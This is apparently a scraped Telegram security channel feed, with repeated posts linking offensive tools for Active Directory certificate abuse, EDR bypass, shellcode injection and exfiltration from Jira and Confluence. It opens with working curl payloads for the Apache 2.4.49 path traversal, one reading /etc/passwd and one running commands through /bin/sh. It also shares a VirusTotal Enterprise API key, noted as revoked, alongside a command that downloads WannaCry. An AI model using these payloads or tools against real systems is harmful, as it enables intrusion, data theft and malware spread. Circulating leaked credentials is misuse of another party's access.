APT
Payload curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k
Apache 2.4.49 Payload RCE
curl --data "echo;id" 'https://127.0.0.1:55026/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'Certipy
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Forwarded from PT SWARM
CVE-2021-26420: Remote Code Execution in Sharepoint via workflow compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
Zero Day Initiative
Zero Day Initiative — CVE-2021-26420: Remote Code Execution in SharePoint via Workflow Compilation
In June of 2021, Microsoft released a patch to correct CVE-20 21-264 20 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI…
Jir-thief
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
GitHub
GitHub - antman1p/Jir-Thief: A Red Team tool for exfiltrating sensitive data from Jira tickets.
A Red Team tool for exfiltrating sensitive data from Jira tickets. - antman1p/Jir-Thief
Conf-thief
A Red Team tool for exfiltrating sensitive data from Confluence pages
https://github.com/antman1p/Conf-Thief
#confluence #redteam
A Red Team tool for exfiltrating sensitive data from Confluence pages
https://github.com/antman1p/Conf-Thief
#confluence #redteam
GitHub
GitHub - antman1p/Conf-Thief: A Red Team tool for exfiltrating sensitive data from Confluence pages.
A Red Team tool for exfiltrating sensitive data from Confluence pages. - antman1p/Conf-Thief
0-Day Hunting (Chaining Bugs/Methodology)
https://blog.riotsecurityteam.com/0day-chains
#0day #methodology
https://blog.riotsecurityteam.com/0day-chains
#0day #methodology
Red Team Tutorials
# https://crypt0jan.medium.com/red-team-tutorials-1-fcc509da20c4
# https://crypt0jan.medium.com/red-team-tutorials-2-e1b86016e231
# https://crypt0jan.medium.com/red-team-tutorials-3-351e76ea796d
# https://crypt0jan.medium.com/red-team-tutorials-4-616c565ccec9
#redteam #metasploit
# https://crypt0jan.medium.com/red-team-tutorials-1-fcc509da20c4
# https://crypt0jan.medium.com/red-team-tutorials-2-e1b86016e231
# https://crypt0jan.medium.com/red-team-tutorials-3-351e76ea796d
# https://crypt0jan.medium.com/red-team-tutorials-4-616c565ccec9
#redteam #metasploit
Medium
RED TEAM TUTORIALS — №1
By default, Meterpreter creates custom SSL certificates to encrypt traffic between the target and your C2 server if you turn on SSL. However, these custom SSL certificates contain fingerprintable…
ScareCrow
Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
#edr #bypass #av #fud
Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
#edr #bypass #av #fud
GitHub
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
ScareCrow - Payload creation framework designed around EDR bypass. - optiv/ScareCrow
#bugbounty
Something interesting from our friends
https://medium.com/@i.safronov/mini-ctf-including-android-reverse-engineering-deobfuscation-antidebug-evasion-with-prizes-d32acc4a190c
Something interesting from our friends
https://medium.com/@i.safronov/mini-ctf-including-android-reverse-engineering-deobfuscation-antidebug-evasion-with-prizes-d32acc4a190c
Medium
Mini-CTF including Android reverse-engineering, deobfuscation, antidebug-evasion. With prizes.
Haven’t hacked anything in a while? Delivery Club cybersecurity team has a challenge for you! We created a vulnerable Android app, you need…
K8s takeover cases sample
https://github.com/Slurmio/webinar-seck8s/
https://github.com/Slurmio/webinar-seck8s/
GitHub
GitHub - slurm-personal/webinar-seck8s: Demo scripts for the Kubernetes Security Webinar held on October 13, 2021 https://www.…
Demo scripts for the Kubernetes Security Webinar held on October 13, 2021 https://www.youtube.com/watch?v=koTqZS-ThZ8&t=1183s - slurm-personal/webinar-seck8s
LDAP Monitor
Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
With this tool you can quickly see if your attack worked and if it changed LDAP attributes of the target object.
https://github.com/p0dalirius/LDAPmonitor
#ldap #monitor
Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
With this tool you can quickly see if your attack worked and if it changed LDAP attributes of the target object.
https://github.com/p0dalirius/LDAPmonitor
#ldap #monitor
VirusTotal Enterprise free API Key
API Key:
```859b88dbbd798a5093089e0455a3d44e9fcb411603041f447f1161be3b96fb18
```Example:
UPD:
This key has been revoked
#virustotal #enterprise #apikey #free
API Key:
```859b88dbbd798a5093089e0455a3d44e9fcb411603041f447f1161be3b96fb18
```Example:
curl 'https://www.virustotal.com/vtapi/v2/file/download?apikey=859b88dbbd798a5093089e0455a3d44e9fcb411603041f447f1161be3b96fb18&hash=76f52cba288145242a77a8762282d8d0e6d8fb3160b5fefb7b92649e503c62a1' --location --output wannacry.exe
SourceUPD:
This key has been revoked
#virustotal #enterprise #apikey #free
APT
Offensive WMI - Reconnaissance & Enumeration (Part 4) This post focuses on interacting with several WMI classes to extract useful and sensitive information https://0xinfection.github.io/posts/wmi-recon-enum/ #wmi
Offensive WMI - Active Directory Enumeration (Part 5)
https://0xinfection.github.io/posts/wmi-ad-enum/
#wmi
https://0xinfection.github.io/posts/wmi-ad-enum/
#wmi
Kubernetes Security Checklist and Requirements
https://github.com/Vinum-Security/kubernetes-security-checklist
#kubernetes #checklist
https://github.com/Vinum-Security/kubernetes-security-checklist
#kubernetes #checklist
GitHub
GitHub - Vinum-Security/kubernetes-security-checklist: Kubernetes Security Checklist and Requirements - All in One (authentication…
Kubernetes Security Checklist and Requirements - All in One (authentication, authorization, logging, secrets, configuration, network, workloads, dockerfile) - Vinum-Security/kubernetes-security-che...
Shellcode Injection Techniques
A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload.
https://github.com/plackyhacker/Shellcode-Injection-Techniques
#inject #shellcode #csharp
A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload.
https://github.com/plackyhacker/Shellcode-Injection-Techniques
#inject #shellcode #csharp
GitHub
GitHub - plackyhacker/Shellcode-Injection-Techniques: A collection of C# shellcode injection techniques. All techniques use an…
A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some ...
This media is not supported in your browser
VIEW IN TELEGRAM
ZipExec
Is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.
https://github.com/Tylous/ZipExec
#redteam #netsec
Is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.
https://github.com/Tylous/ZipExec
#redteam #netsec
This media is not supported in your browser
VIEW IN TELEGRAM